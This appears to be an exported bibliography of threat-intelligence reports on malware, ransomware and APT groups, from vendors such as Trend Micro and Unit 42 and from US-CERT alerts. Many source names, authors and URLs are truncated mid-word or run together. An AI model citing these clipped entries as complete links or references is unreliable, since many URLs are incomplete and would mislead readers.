TechnospotMohta, A. (http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings
Telefonica Jornet, A. https://telefonicatech.com/blog/snip3-investigacion-malware
Tetra DefeTetra Defe https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-an
The HackerLakshmanan https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html
ThreatConnThreatConnhttps://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/
ThreatExpeShevchenko, http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html
ThreatGeekFidelis Thr https://www.fidelissecurity.com/threatgeek/threat-intelligence/turbo-twist-two-64-bit-derusbi-strains-c
ThreatStreShelmire, Ahttps://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-
ThreatpostTom Springhttps://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/
ThreatpostSeals, T. ( https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/
ThreatpostL. O'Donnehttps://threatpost.com/sharpshooter-complexity-scope/142359/
ThreatpostMichael Mihttps://threatpost.com/projectsauron-apt-on-par-with-equation-flame-duqu/119725/
Tilbury Wi Chad Tilburhttps://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniq
Token tactiMicrosoft https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-
Trellix Dar Ernesto Fe https://www.trellix.com/blogs/research/the-continued-evolution-of-the-darkgate-malware-as-a-service
Trellix Sc Trellix et. https://www.trellix.com/blogs/research/scattered-spider-the-modus-operandi/
Trend MicrTrend Micro https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avo
Trend MicrSalvio, J.. https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffin
Trend MicrGonzalez, Ihttps://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-
Trend MicrKenefick, I https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ra
Trend MicrTrend Micrhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blac
Trend MicrDela Cruz, https://www.trendmicro.com/en_se/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-e
Trend MicrTrend Micro https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/conficker
Trend MicrHaquebord,https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html
Trend MicrLunghi, D. https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf
Trend MicrChen, J. a http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoo
Trend MicrTrend Micro https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf
Trend MicrChen, J. ( https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magec
Trend MicrSancho, D.,https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_ixeshe.pdf
Trend Micro
Lunghi, D. https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupda
Trend Micro
Fernando Me https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-org
Trend Micro
Gilbert Sis https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-l
Trend Mic Magisa, L. https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-sur
Trend Mic Peretz, A. https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-org
Trend MicrBorja, A. C https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngro
Trend MicrHacquebord, https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf
Trend MicrHacquebord, https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-a
Trend Mic Trend Micrhttps://success.trendmicro.com/solution/000283381
Trend MicrMendoza, E. https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/qakbot-resurges-s
Trend MicrCentero, R.https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html
Trend MicrTrend Micrhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play
Trend MicrMorales, N.https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-lin
Trend MicrRemillano, https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capab
Trend MicrHiroaki, H. https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-group
Trend Mic Fiser, D. O https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf
Trend MicrChen, J. et https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for
Trend MicrAntazo, F. https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n
Trend MicrAnthony, Nhttps://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-gra
Trend Mic Su, V. et a https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-securi
Trend MicrTrend Micrhttps://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-multi-platfor
Trend MicrPascual, C https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable
TrendMicr Sioting, S. https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/BKDR_URSNIF.SM?_ga=2.1294689
TrendMicroBermejo, L.https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-c
TrendMicroGiagone, R.https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-87
TrendMicroLunghi, D. https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-ta
TrendMicroLunghi, D ahttps://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.h
TrendMicroTrendMicrohttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET
TrendMicroChen, J., e https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-s
TrendMicroKakara, H. https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in
TrendMicroLin, P. (20 http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep
TrendMicroTrend Micro https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on
TrendMicroHorejsi, J https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus
TrendMicroCo, M. andhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe
TrendMicroVictor, K.. https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via
TrendMicroChen, Jose https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-ta
TrendMicr Trend Micrhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_URSNIF.A2?_ga=2.131425807
TrendMicr Lunghi, D. https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-b
TrendMicroLunghi, D., https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.
TrendMicr Hacquebord, https://documents.trendmicro.com/assets/white_papers/wp-pawn-storm-in-2019.pdf
TrendMicr Hacquebord, https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htm
TrendMicroShinji Robehttps://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html
TrendMicroChristophehttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governme
TrendMicroTrendLabs http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf
S
TrendMicr Wu, W. (20https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerabi
TrendMicr Trend Micrhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-
TrendMicroTrend Micrhttp://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor
TrendMicroDaniel Lughhttps://vb2020.vblocalhost.com/uploads/VB2020-06.pdf
TrendMicroLlimos, N., https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credentia
TrendMicroHorejsi, J. https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/
TrendMicroChen, J.. ( https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-A
TrendMicroAlintanahinhttps://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf
TrendMicroCaragay, R.https://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/
TrendMicroCaragay, R https://web.archive.org/web/20210719165945/https://www.trendmicro.com/en_us/research/15/c/urs
TrendMicr Mabutas, Ghttps://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazaru
TrendmicroGabrielle J https://www.trendmicro.com/en_us/research/20/g/updates-on-quickly-evolving-thiefquest-macos-malw
TrendmicroKenefick , https://www.trendmicro.com/en_us/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distr
Trickbot V Ionut Illas https://www.bleepingcomputer.com/news/security/trickbot-updates-its-vnc-module-for-high-value-targ
Triton-EENBlake Sobczhttps://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/
TrueSec G TrueSec. ( https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
TrustedSe Tyler Hudahttps://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-i
Trusteer C Trusteer Frhttps://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_A
Trustwave Merritt, E. https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Ma
Trustwave Trustwave https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-e
Trustwave Trustwave https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninsta
S
Trustwave Trustwave https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/
S
Twitter Cg Glyer, C. ( https://x.com/cglyer/status/985311489782374400
Twitter It Carr, N.. https://x.com/ItsReallyNick/status/945681177108762624
Twitter Its Carr, N. ( https://x.com/ItsReallyNick/status/1189622925286084609
Twitter It Carr, N.. ( https://x.com/ItsReallyNick/status/1055321868641689600
Twitter It Carr, N. (2 https://x.com/ItsReallyNick/status/944321013084573697
UCF STIG EUCF. (n.d. https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding
UCF STIG SUCF. (n.d.) https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-264
UK NCSC OlUK NCSC. (https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and
US Distric Brady, S . https://www.justice.gov/opa/page/file/1098481/download
US Distric Scott W. Brhttps://www.justice.gov/opa/press-release/file/1328521/download
US-CERT APUS-CERT. (2https://www.us-cert.gov/ncas/alerts/TA17-293A
US-CERT AlUS-CERT. (nhttps://www.us-cert.gov/ncas/alerts/TA13-175A
US-CERT B US-CERT. ( https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF
US-CERT B US-CERT. ( https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a
US-CERT BaUS-CERT. ( https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF
US-CERT Em US-CERT. ( https://www.us-cert.gov/ncas/alerts/TA18-201A
US-CERT FAUS-CERT. ( https://www.us-cert.gov/ncas/alerts/TA17-318A
US-CERT HUS-CERT. ( https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
US-CERT HUS-CERT. ( https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
US-CERT HUS-CERT. ( https://www.us-cert.gov/ncas/analysis-reports/ar20-045d
US-CERT K US-CERT. ( https://www.us-cert.gov/ncas/analysis-reports/AR18-221A
US-CERT NoUS-CERT. ( https://www.us-cert.gov/ncas/alerts/TA17-181A
US-CERT S US-CERT. ( https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf
US-CERT SM US-CERT. ( https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices
US-CERT T US-CERT. ( https://us-cert.cisa.gov/ncas/alerts/TA17-156A
US-CERT T US-CERT. (2https://www.us-cert.gov/ncas/alerts/TA18-074A
US-CERT TAUS-CERT. (2https://us-cert.cisa.gov/ncas/alerts/TA18-106A
US-CERT T US-CERT. ( https://www.us-cert.gov/ncas/analysis-reports/AR18-165A
US-CERT UkUS-CERT. (2https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01
US-CERT VoUS-CERT. ( https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF
US-CERT V US-CERT. ( https://www.us-cert.gov/ncas/alerts/TA17-318B
US-CERT WUS-CERT. ( https://www.us-cert.gov/ncas/alerts/TA17-132A
US-CERT-T US-CERT. (2https://www.us-cert.gov/ncas/alerts/TA18-106A
Ukraine15 Electricity https://nsarchive.gwu.edu/sites/default/files/documents/3891751/SANS-and-Electricity-Information-Sh
Umbreon TFernando M https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-h
Unit 42 Ba Hinchliffe, https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-
Unit 42 Ba Bar, T., Co https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/
Unit 42 BisHayashi, K.https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-sou
Unit 42 C0 Grunzweig,https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/
Unit 42 CAMcCabe, A.https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear
Unit 42 C Grunzweig,https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-
Unit 42 Co Unit 42. ( https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobal
Unit 42 DaFalcone, R.https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targ
Unit 42 GaUnit 42. (2 https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/
Unit 42 GoFalcone, R.https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cyb
Unit 42 Hi Chen, J. et https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
Unit 42 In Lancaster, https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerab
Unit 42 IroReichel, D. https://unit42.paloaltonetworks.com/ironnetinjector/
Unit 42 Ka Levene, B, https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoo
Unit 42 Ke Ray, V. an https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/
Unit 42 LucHsu, K. et https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/
Unit 42 MaLee, B. an https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-tar
Unit 42 MeFalcone, R https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/
Unit 42 M Lancaster, https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-
Unit 42 NEDuncan, B.https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/
Unit 42 NOGrunzweig,https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-so
Unit 42 NoGrunzweig,https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-r
Unit 42 OilFalcone, R.https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-governmen
Unit 42 OoLee, B., Fa https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-ne
Unit 42 Pa Jay Chen. https://unit42.paloaltonetworks.com/ransomware-in-public-clouds/
Unit 42 Ph Falcone, R.https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-creden
Unit 42 PinUnit 42. ( https://unit42.paloaltonetworks.com/pingpull-gallium/
Unit 42 Pl Unit 42. ( https://pan-unit42.github.io/playbook_viewer/
Unit 42 Pr Falcone, R https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operatio
Unit 42 Q Lee, B., F https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provide
Unit 42 RGFalcone, R.https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-m
Unit 42 Ro Xingyu, J.. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-clou
Unit 42 Se Grunzweig,http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/
Unit 42 S Falcone, R https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
Unit 42 Sil Prizmant, https://unit42.paloaltonetworks.com/siloscape/
Unit 42 So Lee, B, et https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-enti
Unit 42 TA Duncan, B.https://unit42.paloaltonetworks.com/ta551-shathak-icedid/
Unit 42 Tr Ray, V. (2 https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-govern
Unit 42 VE Lancaster, https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used
Unit 42 ValDuncan, B.https://unit42.paloaltonetworks.com/valak-evolution/
Unit 42 WhFalcone, R.https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/#whispergate
Unit42 Aci Reichel, D. https://unit42.paloaltonetworks.com/acidbox-rare-malware/
Unit42 AgrOr Chechik,https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/
Unit42 AzoYan, T., e https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant
Unit42 BabLim, M.. ( https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-a
Unit42 BabUnit 42. (2 https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks
Unit42 BenHarbison, https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/
Unit42 CanFalcone, R https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-n
Unit42 ClopSantos, D. https://unit42.paloaltonetworks.com/clop-ransomware/
Unit42 CooChen, y., e https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
Unit42 DarLee, B., Fa https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-
Unit42 EmiFalcone, R.https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-serve
Unit42 LocHarbison, M https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
Unit42 MolFalcone, R https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/
Unit42 OceErye Hernahttps://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/
Unit42 Oil Falcone, R.https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery
Unit42 Oil Unit42. (20https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens
Unit42 Plu Lancaster, https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
Unit42 RDAFalcone, R.https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/
Unit42 RedDuncan, B.https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/
Unit42 SU Tennis, M. https://unit42.paloaltonetworks.com/solarstorm-supernova/
Unit42 SilvRenals, P., https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-
Unit42 SilvUnit42. (2 https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_U
Unit42 Sof Lee, B., Fa https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/
Unit42 XbaXiao, C. ( https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coi
University Gardiner, Jhttps://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
